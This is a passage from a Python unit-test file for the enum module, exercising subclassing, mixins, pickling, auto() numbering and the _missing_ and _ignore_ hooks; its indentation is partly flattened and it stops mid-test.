self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
self.assertTrue(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
with self.assertRaisesRegex(TypeError, "EvenMoreColor: cannot extend enumeration 'Color'"):
class EvenMoreColor(Color, IntEnum):
chartruese = 7
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
    def test_subclasses_without_direct_pickle_support(self):
        """Without any pickle support on the mixin, pickling a member raises
        TypeError and pickling the class raises PicklingError."""
        class NamedInt(int):
            __qualname__ = 'NamedInt'
            def __new__(cls, *args):
                _args = args
                name, *args = args
                if len(args) == 0:
                    raise TypeError("name and value must be specified")
                self = int.__new__(cls, *args)
                self._intname = name
                self._args = _args
                return self
            @property
            def __name__(self):
                return self._intname
            def __repr__(self):
                # repr() is updated to include the name and type info
                return "{}({!r}, {})".format(type(self).__name__,
                                             self.__name__,
                                             int.__repr__(self))
            def __str__(self):
                # str() is unchanged, even if it relies on the repr() fallback
                base = int
                base_str = base.__str__
                if base_str.__objclass__ is object:
                    return base.__repr__(self)
                return base_str(self)
            # for simplicity, we only define one operator that
            # propagates expressions
            def __add__(self, other):
                temp = int(self) + int( other)
                if isinstance(self, NamedInt) and isinstance(other, NamedInt):
                    return NamedInt(
                        '({0} + {1})'.format(self.__name__, other.__name__),
                        temp )
                else:
                    return temp
        class NEI(NamedInt, Enum):
            __qualname__ = 'NEI'
            x = ('the-x', 1)
            y = ('the-y', 2)
        self.assertIs(NEI.__new__, Enum.__new__)
        self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
        globals()['NamedInt'] = NamedInt
        globals()['NEI'] = NEI
        NI5 = NamedInt('test', 5)
        self.assertEqual(NI5, 5)
        self.assertEqual(NEI.y.value, 2)
        # no __reduce_ex__ anywhere, so both pickling attempts must fail
        test_pickle_exception(self.assertRaises, TypeError, NEI.x)
        test_pickle_exception(self.assertRaises, PicklingError, NEI)
    def test_subclasses_without_direct_pickle_support_using_name(self):
        """A __reduce_ex__ on the Enum itself that pickles by member *name*
        (via getattr) makes an otherwise unpicklable mixin picklable."""
        class NamedInt(int):
            __qualname__ = 'NamedInt'
            def __new__(cls, *args):
                _args = args
                name, *args = args
                if len(args) == 0:
                    raise TypeError("name and value must be specified")
                self = int.__new__(cls, *args)
                self._intname = name
                self._args = _args
                return self
            @property
            def __name__(self):
                return self._intname
            def __repr__(self):
                # repr() is updated to include the name and type info
                return "{}({!r}, {})".format(type(self).__name__,
                                             self.__name__,
                                             int.__repr__(self))
            def __str__(self):
                # str() is unchanged, even if it relies on the repr() fallback
                base = int
                base_str = base.__str__
                if base_str.__objclass__ is object:
                    return base.__repr__(self)
                return base_str(self)
            # for simplicity, we only define one operator that
            # propagates expressions
            def __add__(self, other):
                temp = int(self) + int( other)
                if isinstance(self, NamedInt) and isinstance(other, NamedInt):
                    return NamedInt(
                        '({0} + {1})'.format(self.__name__, other.__name__),
                        temp )
                else:
                    return temp
        class NEI(NamedInt, Enum):
            __qualname__ = 'NEI'
            x = ('the-x', 1)
            y = ('the-y', 2)
            def __reduce_ex__(self, proto):
                # pickle by name: unpickling does getattr(NEI, name)
                return getattr, (self.__class__, self._name_)
        self.assertIs(NEI.__new__, Enum.__new__)
        self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
        globals()['NamedInt'] = NamedInt
        globals()['NEI'] = NEI
        NI5 = NamedInt('test', 5)
        self.assertEqual(NI5, 5)
        self.assertEqual(NEI.y.value, 2)
        test_pickle_dump_load(self.assertIs, NEI.y)
        test_pickle_dump_load(self.assertIs, NEI)
    def test_tuple_subclass(self):
        """tuple can be mixed into Enum; members are both tuples and members,
        and round-trip through pickle."""
        class SomeTuple(tuple, Enum):
            __qualname__ = 'SomeTuple'  # needed for pickle protocol 4
            first = (1, 'for the money')
            second = (2, 'for the show')
            third = (3, 'for the music')
        self.assertIs(type(SomeTuple.first), SomeTuple)
        self.assertIsInstance(SomeTuple.second, tuple)
        self.assertEqual(SomeTuple.third, (3, 'for the music'))
        # make the class reachable for pickling
        globals()['SomeTuple'] = SomeTuple
        test_pickle_dump_load(self.assertIs, SomeTuple.first)
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_equality(self):
class AlwaysEqual:
def __eq__(self, other):
return True
class OrdinaryEnum(Enum):
a = 1
self.assertEqual(AlwaysEqual(), OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, AlwaysEqual())
    def test_ordered_mixin(self):
        """A mixin supplying the rich-comparison dunders gives ordered Enums."""
        class OrderedEnum(Enum):
            def __ge__(self, other):
                if self.__class__ is other.__class__:
                    return self._value_ >= other._value_
                return NotImplemented
            def __gt__(self, other):
                if self.__class__ is other.__class__:
                    return self._value_ > other._value_
                return NotImplemented
            def __le__(self, other):
                if self.__class__ is other.__class__:
                    return self._value_ <= other._value_
                return NotImplemented
            def __lt__(self, other):
                if self.__class__ is other.__class__:
                    return self._value_ < other._value_
                return NotImplemented
        class Grade(OrderedEnum):
            A = 5
            B = 4
            C = 3
            D = 2
            F = 1
        self.assertGreater(Grade.A, Grade.B)
        self.assertLessEqual(Grade.F, Grade.C)
        self.assertLess(Grade.D, Grade.A)
        self.assertGreaterEqual(Grade.B, Grade.B)
        self.assertEqual(Grade.B, Grade.B)
        self.assertNotEqual(Grade.C, Grade.D)
    def test_extending2(self):
        """Subclassing an Enum that already has members is a TypeError."""
        class Shade(Enum):
            def shade(self):
                print(self.name)
        class Color(Shade):
            red = 1
            green = 2
            blue = 3
        # Color has members, so it cannot be subclassed further
        with self.assertRaises(TypeError):
            class MoreColor(Color):
                cyan = 4
                magenta = 5
                yellow = 6
    def test_extending3(self):
        """Member-less Enums may be subclassed repeatedly; methods accumulate
        down the chain and work on the eventual members."""
        class Shade(Enum):
            def shade(self):
                return self.name
        class Color(Shade):
            def hex(self):
                return '%s hexlified!' % self.value
        class MoreColor(Color):
            cyan = 4
            magenta = 5
            yellow = 6
        self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
    def test_subclass_duplicate_name(self):
        """A member may shadow a plain method inherited from the base Enum."""
        class Base(Enum):
            def test(self):
                pass
        class Test(Base):
            test = 1
        # the member wins over the inherited method
        self.assertIs(type(Test.test), Test)
    def test_subclass_duplicate_name_dynamic(self):
        """A DynamicClassAttribute keeps working on a member whose name
        shadows it: attribute access on the member goes to the descriptor."""
        from types import DynamicClassAttribute
        class Base(Enum):
            @DynamicClassAttribute
            def test(self):
                return 'dynamic'
        class Test(Base):
            test = 1
        self.assertEqual(Test.test.test, 'dynamic')
    def test_no_duplicates(self):
        """__init__ can reject alias values by checking already-created
        members; defining an alias then raises during class creation."""
        class UniqueEnum(Enum):
            def __init__(self, *args):
                cls = self.__class__
                if any(self.value == e.value for e in cls):
                    a = self.name
                    e = cls(self.value).name
                    raise ValueError(
                        "aliases not allowed in UniqueEnum: %r --> %r"
                        % (a, e)
                    )
        class Color(UniqueEnum):
            red = 1
            green = 2
            blue = 3
        # 'grene' duplicates green's value, so class creation must fail
        with self.assertRaises(ValueError):
            class Color(UniqueEnum):
                red = 1
                green = 2
                blue = 3
                grene = 2
    def test_init(self):
        """Tuple values are star-passed to __init__, which may store extra
        per-member attributes; value stays the whole tuple."""
        class Planet(Enum):
            MERCURY = (3.303e+23, 2.4397e6)
            VENUS   = (4.869e+24, 6.0518e6)
            EARTH   = (5.976e+24, 6.37814e6)
            MARS    = (6.421e+23, 3.3972e6)
            JUPITER = (1.9e+27,   7.1492e7)
            SATURN  = (5.688e+26, 6.0268e7)
            URANUS  = (8.686e+25, 2.5559e7)
            NEPTUNE = (1.024e+26, 2.4746e7)
            def __init__(self, mass, radius):
                self.mass = mass       # in kilograms
                self.radius = radius   # in meters
            @property
            def surface_gravity(self):
                # universal gravitational constant  (m3 kg-1 s-2)
                G = 6.67300E-11
                return G * self.mass / (self.radius * self.radius)
        self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
        self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
    def test_ignore(self):
        """Names listed in _ignore_ are usable as scaffolding inside the class
        body but do not become members or attributes."""
        class Period(timedelta, Enum):
            '''
            different lengths of time
            '''
            def __new__(cls, value, period):
                obj = timedelta.__new__(cls, value)
                obj._value_ = value
                obj.period = period
                return obj
            _ignore_ = 'Period i'
            # use the class namespace dict to define members programmatically
            Period = vars()
            for i in range(13):
                Period['month_%d' % i] = i*30, 'month'
            for i in range(53):
                Period['week_%d' % i] = i*7, 'week'
            for i in range(32):
                Period['day_%d' % i] = i, 'day'
            OneDay = day_1
            OneWeek = week_1
            OneMonth = month_1
        # ignored names must not survive on the finished class
        self.assertFalse(hasattr(Period, '_ignore_'))
        self.assertFalse(hasattr(Period, 'Period'))
        self.assertFalse(hasattr(Period, 'i'))
        self.assertTrue(isinstance(Period.day_1, timedelta))
        self.assertTrue(Period.month_1 is Period.day_30)
        self.assertTrue(Period.week_4 is Period.day_28)
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
for enum, value in zip(ColorInAList, range(3)):
value += 1
self.assertEqual(enum.value, [value])
self.assertIs(ColorInAList([value]), enum)
    def test_conflicting_types_resolved_in_new(self):
        """A custom __new__ can split a tuple definition into the int value
        and an extra attribute, reconciling the int mixin with tuple syntax."""
        class LabelledIntEnum(int, Enum):
            def __new__(cls, *args):
                value, label = args
                obj = int.__new__(cls, value)
                obj.label = label
                obj._value_ = value
                return obj
        class LabelledList(LabelledIntEnum):
            unprocessed = (1, "Unprocessed")
            payment_complete = (2, "Payment Complete")
        self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
        self.assertEqual(LabelledList.unprocessed, 1)
        self.assertEqual(LabelledList(1), LabelledList.unprocessed)
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
    def test_auto_name_inherit(self):
        """_generate_next_value_ defined on a member-less base is inherited
        and used for auto() in subclasses."""
        class AutoNameEnum(Enum):
            def _generate_next_value_(name, start, count, last):
                return name
        class Color(AutoNameEnum):
            red = auto()
            blue = auto()
            green = auto()
        self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
        self.assertEqual(Color.red.value, 'red')
        self.assertEqual(Color.blue.value, 'blue')
        self.assertEqual(Color.green.value, 'green')
    def test_auto_garbage(self):
        """auto() after a non-int value falls back to counting from 1."""
        class Color(Enum):
            red = 'red'
            blue = auto()
        self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
    def test_auto_order(self):
        """Defining _generate_next_value_ after members already used auto()
        is an error: the hook must exist before it is needed."""
        with self.assertRaises(TypeError):
            class Color(Enum):
                red = auto()
                green = auto()
                blue = auto()
                def _generate_next_value_(name, start, count, last):
                    return name
    def test_auto_order_wierd(self):
        """Pathological case: an auto() instance given an explicit value
        before class creation keeps that value, and a later
        _generate_next_value_ still applies to subsequent auto() uses."""
        weird_auto = auto()
        weird_auto.value = 'pathological case'
        class Color(Enum):
            red = weird_auto
            def _generate_next_value_(name, start, count, last):
                return name
            blue = auto()
        self.assertEqual(list(Color), [Color.red, Color.blue])
        self.assertEqual(Color.red.value, 'pathological case')
        self.assertEqual(Color.blue.value, 'blue')
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_default_missing(self):
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
    def test_missing(self):
        """_missing_ hook: may return a member, return garbage (internal
        TypeError chained to ValueError), raise (chained), or return None
        (plain not-found ValueError)."""
        class Color(Enum):
            red = 1
            green = 2
            blue = 3
            @classmethod
            def _missing_(cls, item):
                if item == 'three':
                    return cls.blue
                elif item == 'bad return':
                    # trigger internal error
                    return 5
                elif item == 'error out':
                    raise ZeroDivisionError
                else:
                    # trigger not found
                    return None
        self.assertIs(Color('three'), Color.blue)
        try:
            Color(7)
        except ValueError as exc:
            # not-found path: no chained context
            self.assertTrue(exc.__context__ is None)
        else:
            raise Exception('Exception not raised.')
        try:
            Color('bad return')
        except TypeError as exc:
            # bad return value: TypeError chained onto the lookup ValueError
            self.assertTrue(isinstance(exc.__context__, ValueError))
        else:
            raise Exception('Exception not raised.')
        try:
            Color('error out')
        except ZeroDivisionError as exc:
            # exception raised inside _missing_ is chained the same way
            self.assertTrue(isinstance(exc.__context__, ValueError))
        else:
            raise Exception('Exception not raised.')
    def test_missing_exceptions_reset(self):
        """A failed Enum lookup must not keep the raising frame alive:
        objects referenced from that frame stay collectable."""
        import weakref
        #
        class TestEnum(enum.Enum):
            VAL1 = 'val1'
            VAL2 = 'val2'
        #
        class Class1:
            def __init__(self):
                # Gracefully handle an exception of our own making
                try:
                    raise ValueError()
                except ValueError:
                    pass
        #
        class Class2:
            def __init__(self):
                # Gracefully handle an exception of Enum's making
                try:
                    TestEnum('invalid_value')
                except ValueError:
                    pass
        # No strong refs here so these are free to die.
        class_1_ref = weakref.ref(Class1())
        class_2_ref = weakref.ref(Class2())
        #
        # The exception raised by Enum creates a reference loop and thus
        # Class2 instances will stick around until the next garbage collection
        # cycle, unlike Class1.
        self.assertIs(class_1_ref(), None)
        self.assertIs(class_2_ref(), None)
def test_multiple_mixin(self):
class MaxMixin:
@classproperty
def MAX(cls):
max = len(cls)
cls.MAX = max
return max
class StrMixin:
def __str__(self):
return self._name_.lower()
class SomeEnum(Enum):
def behavior(self):
return 'booyah'
class AnotherEnum(Enum):
def behavior(self):
return 'nuhuh!'
def social(self):
return "what's up?"
class Color(MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(MaxMixin, StrMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class CoolColor(StrMixin, SomeEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolColor.RED.value, 1)
self.assertEqual(CoolColor.GREEN.value, 2)
self.assertEqual(CoolColor.BLUE.value, 3)
self.assertEqual(str(CoolColor.BLUE), 'blue')
self.assertEqual(CoolColor.RED.behavior(), 'booyah')
class CoolerColor(StrMixin, AnotherEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolerColor.RED.value, 1)
self.assertEqual(CoolerColor.GREEN.value, 2)
self.assertEqual(CoolerColor.BLUE.value, 3)
self.assertEqual(str(CoolerColor.BLUE), 'blue')
self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!')
self.assertEqual(CoolerColor.RED.social(), "what's up?")
class CoolestColor(StrMixin, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolestColor.RED.value, 1)
self.assertEqual(CoolestColor.GREEN.value, 2)
self.assertEqual(CoolestColor.BLUE.value, 3)
self.assertEqual(str(CoolestColor.BLUE), 'blue')
self.assertEqual(CoolestColor.RED.behavior(), 'booyah')
self.assertEqual(CoolestColor.RED.social(), "what's up?")
class ConfusedColor(StrMixin, AnotherEnum, SomeEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ConfusedColor.RED.value, 1)
self.assertEqual(ConfusedColor.GREEN.value, 2)
self.assertEqual(ConfusedColor.BLUE.value, 3)
self.assertEqual(str(ConfusedColor.BLUE), 'blue')
self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ReformedColor.RED.value, 1)
self.assertEqual(ReformedColor.GREEN.value, 2)
self.assertEqual(ReformedColor.BLUE.value, 3)
self.assertEqual(str(ReformedColor.BLUE), 'blue')
self.assertEqual(ReformedColor.RED.behavior(), 'booyah')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
self.assertTrue(issubclass(ReformedColor, int))
    def test_multiple_inherited_mixin(self):
        """@unique works on Enums whose mixin defines a custom __new__,
        both directly and one inheritance level down."""
        class StrEnum(str, Enum):
            def __new__(cls, *args, **kwargs):
                for a in args:
                    if not isinstance(a, str):
                        raise TypeError("Enumeration '%s' (%s) is not"
                                        " a string" % (a, type(a).__name__))
                return str.__new__(cls, *args, **kwargs)
        @unique
        class Decision1(StrEnum):
            REVERT = "REVERT"
            REVERT_ALL = "REVERT_ALL"
            RETRY = "RETRY"
        class MyEnum(StrEnum):
            pass
        @unique
        class Decision2(MyEnum):
            REVERT = "REVERT"
            REVERT_ALL = "REVERT_ALL"
            RETRY = "RETRY"
    def test_multiple_mixin_inherited(self):
        """Mixins may themselves be subclasses; a later __new__ on the Enum
        subclass overrides the inherited creation logic."""
        class MyInt(int):
            def __new__(cls, value):
                return super().__new__(cls, value)
        class HexMixin:
            def __repr__(self):
                return hex(self)
        class MyIntEnum(HexMixin, MyInt, enum.Enum):
            pass
        class Foo(MyIntEnum):
            TEST = 1
        self.assertTrue(isinstance(Foo.TEST, MyInt))
        self.assertEqual(repr(Foo.TEST), "0x1")
        class Fee(MyIntEnum):
            TEST = 1
            def __new__(cls, value):
                # shift the stored value to prove this __new__ is used
                value += 1
                member = int.__new__(cls, value)
                member._value_ = value
                return member
        self.assertEqual(Fee.TEST, 2)
def test_empty_globals(self):
# bpo-35717: sys._getframe(2).f_globals['__name__'] fails with KeyError
# when using compile and exec because f_globals is empty
code = "from enum import Enum; Enum('Animal', 'ANT BEE CAT DOG')"
